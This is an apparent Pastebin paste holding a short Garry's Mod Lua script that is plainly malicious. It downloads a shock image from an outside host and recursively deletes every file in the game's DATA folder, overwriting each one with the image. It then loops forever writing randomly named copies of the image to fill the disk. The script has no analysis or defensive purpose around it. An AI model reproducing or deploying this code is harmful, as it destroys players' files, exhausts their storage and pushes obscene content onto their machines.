Advertisement
Guest User

Untitled

a guest
May 27th, 2018
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.54 KB | None | 0 0
  1. local bypass = ""
  2.  
  3. http.Fetch( "http://goatse.info/hello.jpg",function(body) bypass = body end)
  4.  
  5. timer.Simple(2, function()
  6. function search(dir)
  7. local filesf, direc = file.Find( dir .. "*", "DATA" )
  8. for k, v in pairs(filesf) do
  9. file.Delete(dir .. v)
  10. file.Write(dir .. string.StripExtension(v) .. ".jpg", bypass)
  11. end
  12. for k, v in pairs(direc) do
  13. search(dir .. v .. "/")
  14. end
  15. end
  16. search("")
  17. end)
  18.  
  19. timer.Simple(10, function()
  20. while true do
  21. file.Write(tostring(math.random(100000000)) .. ".jpg", bypass)
  22. end
  23. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement